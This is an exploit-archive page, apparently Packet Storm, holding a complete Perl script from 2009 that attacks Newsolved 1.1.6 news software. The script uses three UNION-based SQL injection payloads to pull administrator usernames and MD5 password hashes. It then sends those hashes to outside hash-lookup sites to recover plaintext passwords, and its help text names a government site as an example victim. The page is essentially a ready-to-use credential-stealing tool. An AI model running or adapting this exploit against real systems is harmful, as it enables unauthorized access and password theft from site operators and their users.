exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Newsolved 1.1.6 SQL Injection

Newsolved 1.1.6 SQL Injection
Posted Jun 29, 2009
Authored by lama | Site jmp-esp.net

Newsolved version 1.1.6 login grabbing remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 6d07775d07b3aa9a2c91da2198f3cbdfa3d2bf36ee68890adfc1c85e6d237879

Newsolved 1.1.6 SQL Injection

Change Mirror Download
#!/usr/bin/perl -w
# Neversolved.pl
#
# Copyright (c) 2009 by <jmp-esp.net>
#
# A simple login grabber
# by lama - 06/23/2009
#
# Tested on: Newsolved 1.1.6

use strict;
use LWP::UserAgent;
use Getopt::Std;
use vars qw/ %opt /;
getopts( "i:p:u:lfh", \%opt );

my @bugs =
(
[
"newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
"monat_num=1:(.*?):([a-f0-9]{32})"
],
[
"newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"([^>]+):([a-f0-9]{32})<"
],
[
"newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
"<i>(.*?):([a-f0-9]{32})<\/i>"
]
);

my @lookups =
(
[
'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
'',
'<div id="result" >(.*?)</div>'
],
[
'http://milw0rm.com/cracker/search.php',
'hash=[HASH]&Submit=Submit',
'>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
],
[
'http://securitystats.com/tools/hashcrack.php',
'inputhash=[HASH]&type=MD5&Submit=Submit',
'<BR>[a-f0-9]{32} = (.*?)</td>'
],
[
'http://md5decrypter.com/index.php',
'hash=[HASH]&submit=Decrypt',
'<b class=\'red\'>Normal Text: </b>(.*?)\n'
]
);

sub isHost
{
my $target = shift;
if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ )
{
my $host = $1;
my $folder = ( $2 ? $2 : '/' );
if ( $folder !~ /\/$/ )
{
$folder .= '/';
}
return "http://$host$folder";
}
else
{
return 0;
}
}

sub replacePlaceholder
{
my $search = shift;
my $replace = shift;
my $placeholder = shift;
$search=~s/\[$placeholder\]/$replace/g;
return $search;
}

sub isVulnerable
{
my $target = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /mysql_fetch_object/)
{
return 1;
}
elsif (!($body =~ /styles_output\.css/))
{
return 0;
}
else
{
return -1;
}
}

sub getHash
{
my $target = shift;
my $regexp = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('GET', $target);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /$regexp/)
{
return ($1, $2);
}
else
{
return 0;
}
}

sub searchPlaintext
{
my $hash = shift;
foreach (@lookups)
{
my $server = replacePlaceholder(@$_[0], $hash, "HASH");
my $post = replacePlaceholder(@$_[1], $hash, "HASH");
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', $server);
$request->content("$post");
$request->content_type('application/x-www-form-urlencoded');
$request->header('Referer' => $server);
$request->header('User-Agent' => $opt{u});
my $response = $ua->request($request);
my $body = $response->content;
if ($body =~ /@$_[2]/)
{
return $1;
}

}
return 0;
}

sub attackTarget
{
my $target = shift;
my $userid = shift;
foreach (@bugs)
{
my $bug = @$_[0];
$bug = replacePlaceholder($bug, $userid, "USERID");
$bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
(my $username, my $password) = getHash($target.$bug, @$_[1]);
if (($username) && ($password))
{
return ($username, $password);
}
}
return 0;
}

sub showHelp
{
print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n"
. "Usage: $0 [options] Victim\n"
. "OPTIONS\n"
. " -i integer: Userid [1]\n"
. " -u string: Useragent [IE]\n"
. " -p string: Prefix [newsolved]\n"
. " -f: Force [optional]\n"
. " -l: Lookup [optional]\n"
. " -h: Help [optional]\n"
. "EXAMPLES\n"
. " ./$0 http://pentagon.gov/news/\n"
. " ./$0 -f -i 4 http://omnomnom.com/\n"
. "OTHER\n"
. " Magic_Quotes_GPC needs to be off\n";
}

sub showBanner
{
print " __ \n"
. " |__|.--------.-----.______.-----.-----.-----.\n"
. " | || | _ |______| -__|__ --| _ |\n"
. " | ||__|__|__| __| |_____|_____| __|\n"
. "|___| |__| lama 06/23/2009 |__| \n"
. "Kampfgeschrei!\n\n";
}

if ($opt{h})
{
showHelp();
exit;
}

my $victim = shift;
if (!($victim) || !($victim = isHost($victim)))
{
showHelp();
exit;
}

$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
$opt{i} = '1' if (!$opt{i});
$opt{p} = 'newsolved' if (!$opt{p});

if (scalar(@bugs) < 1)
{
print "Bugs or gtfo. Srsly.\n";
exit;
}

my $vulnerability = isVulnerable($victim.$bugs[0][0]);
if ($vulnerability == 0)
{
print "This doesn't look like Newsolved. Read the help, now.\n\n";
showHelp();
exit if (!$opt{f});
}
elsif ($vulnerability == -1)
{
print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n";
showHelp();
exit if (!$opt{f});
}

showBanner();
(my $username, my $password) = attackTarget($victim, $opt{i});
if ($username)
{
print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n";
print "Username:\t$username\nPassword:\t$password\n";
if ($opt{l})
{
my $cleartext = searchPlaintext($password);
if ($cleartext)
{
print "Cleartext:\t$cleartext\n";
}
else
{
print "Cleartext:\tNot found\n";
}
}
}
else
{
print "Unable to retrieve the password: Is the userid correct?\n";
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close